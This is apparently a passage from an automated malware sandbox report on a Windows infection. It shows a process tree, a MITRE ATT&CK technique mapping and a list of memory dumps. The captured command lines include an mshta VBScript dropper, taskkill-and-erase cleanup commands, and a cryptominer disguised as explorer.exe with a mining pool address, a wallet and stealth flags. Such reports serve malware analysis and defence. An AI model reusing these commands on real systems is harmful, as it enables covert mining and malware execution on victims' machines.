        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        8⤵
        
        PID:2692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>RqS~WQ.qCt"
        8⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "786101.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:2768
- C:\ProgramData\5821209.exe
  "C:\ProgramData\5821209.exe"
  2⤵
  PID:2844

C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe
Sun03f5d51697d04.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728
- C:\Users\Admin\AppData\Local\Temp\is-S4Q91.tmp\Sun03f5d51697d04.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-S4Q91.tmp\Sun03f5d51697d04.tmp" /SL5="$30158,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe"
  2⤵
  - Executes dropped EXE
  PID:2288
- - C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe
    "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe" /SILENT
    3⤵
    PID:2420

C:\Users\Admin\AppData\Local\Temp\is-IC50E.tmp\Sun03f5d51697d04.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IC50E.tmp\Sun03f5d51697d04.tmp" /SL5="$40158,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun03f5d51697d04.exe" /SILENT
1⤵
PID:2484
- C:\Users\Admin\AppData\Local\Temp\is-PBFQH.tmp\postback.exe
  "C:\Users\Admin\AppData\Local\Temp\is-PBFQH.tmp\postback.exe" ss1
  2⤵
  PID:2800

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Sun033e271e0ce96c08.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCF15C5D5\Sun033e271e0ce96c08.exe" & exit
1⤵
PID:2764
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /im "Sun033e271e0ce96c08.exe" /f
  2⤵
  - Kills process with taskkill
  PID:2824

C:\Windows\system32\taskeng.exe
taskeng.exe {E656C51C-A970-488B-A574-858013077291} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
1⤵
PID:2052
- C:\Users\Admin\AppData\Roaming\ifsdjes
  C:\Users\Admin\AppData\Roaming\ifsdjes
  2⤵
  PID:1112

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:2536
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1744

C:\Users\Admin\AppData\Roaming\services64.exe
C:\Users\Admin\AppData\Roaming\services64.exe
1⤵
PID:432
- C:\Windows\System32\conhost.exe
  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
  2⤵
  PID:2488
- - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
    3⤵
    PID:2672
  - - C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "/sihost64"
      4⤵
      PID:2828
- - C:\Windows\explorer.exe
    C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
    3⤵
    PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:2784

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\8076700.exe"" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """"== """" for %T in ( ""C:\Users\Admin\AppData\Roaming\8076700.exe"") do taskkill /im ""%~nxT"" /f " , 0 ,tRue ) )
1⤵
PID:2832
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\8076700.exe" LYCw0J.ExE &&stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF ""== "" for %T in ( "C:\Users\Admin\AppData\Roaming\8076700.exe") do taskkill /im "%~nxT" /f
  2⤵
  PID:2368
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im "8076700.exe" /f
    3⤵
    - Kills process with taskkill
    PID:3044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/432-198-0x00000000001D0000-0x00000000001F9000-memory.dmp

Filesize
164KB

Download
memory/432-200-0x0000000000400000-0x0000000000458000-memory.dmp

Filesize
352KB

Download
memory/432-199-0x0000000000290000-0x00000000002DA000-memory.dmp

Filesize
296KB

Download
memory/548-206-0x0000000000030000-0x0000000000031000-memory.dmp

Filesize
4KB

Download
memory/584-55-0x0000000076081000-0x0000000076083000-memory.dmp

Filesize
8KB

Download
memory/636-224-0x0000000003EC0000-0x000000000400A000-memory.dmp

Filesize
1.3MB

Download
memory/1272-85-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1272-88-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1272-86-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1272-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1272-94-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1272-91-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1272-95-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1272-98-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1272-87-0x000000006FE40000-0x000000006FFC6000-memory.dmp

Filesize
1.5MB

Download
memory/1272-96-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1272-97-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1272-93-0x000000006B280000-0x000000006B2A6000-memory.dmp

Filesize
152KB

Download
memory/1272-92-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1272-84-0x000000006B440000-0x000000006B4CF000-memory.dmp

Filesize
572KB

Download
memory/1272-90-0x0000000064940000-0x0000000064959000-memory.dmp

Filesize
100KB

Download
memory/1404-205-0x0000000002970000-0x0000000002986000-memory.dmp

Filesize
88KB

Download
memory/1596-195-0x00000000003D0000-0x00000000003D9000-memory.dmp

Filesize
36KB

Download
memory/1596-196-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download
memory/1596-194-0x0000000000250000-0x0000000000258000-memory.dmp

Filesize
32KB

Download
memory/1656-219-0x00000000002A0000-0x00000000002EC000-memory.dmp

Filesize
304KB

Download
memory/1656-220-0x0000000000400000-0x000000000058E000-memory.dmp

Filesize
1.6MB

Download
memory/1656-218-0x0000000000720000-0x000000000074A000-memory.dmp

Filesize
168KB

Download
memory/1672-223-0x0000000002140000-0x0000000002D8A000-memory.dmp

Filesize
12.3MB

Download
memory/1728-193-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1760-197-0x0000000001340000-0x0000000001341000-memory.dmp

Filesize
4KB

Download
memory/2004-241-0x0000000000350000-0x0000000000351000-memory.dmp

Filesize
4KB

Download
memory/2004-248-0x000000001B410000-0x000000001B412000-memory.dmp

Filesize
8KB

Download
memory/2004-201-0x00000000011C0000-0x00000000011C1000-memory.dmp

Filesize
4KB

Download
memory/2144-245-0x00000000003D0000-0x00000000003F2000-memory.dmp

Filesize
136KB

Download
memory/2144-250-0x0000000002190000-0x00000000021AB000-memory.dmp

Filesize
108KB

Download
memory/2144-249-0x00000000008A0000-0x00000000008BC000-memory.dmp

Filesize
112KB

Download
memory/2144-247-0x0000000000400000-0x000000000044B000-memory.dmp

Filesize
300KB

Download
memory/2144-246-0x0000000000450000-0x0000000000480000-memory.dmp

Filesize
192KB

Download
memory/2288-208-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2420-214-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2484-217-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/2528-253-0x0000000001390000-0x0000000001391000-memory.dmp

Filesize
4KB

Download
memory/2608-231-0x00000000003C0000-0x00000000003C1000-memory.dmp

Filesize
4KB

Download
memory/2800-235-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

Filesize
8KB

Download
memory/2932-239-0x00000000003D0000-0x0000000000402000-memory.dmp

Filesize
200KB

Download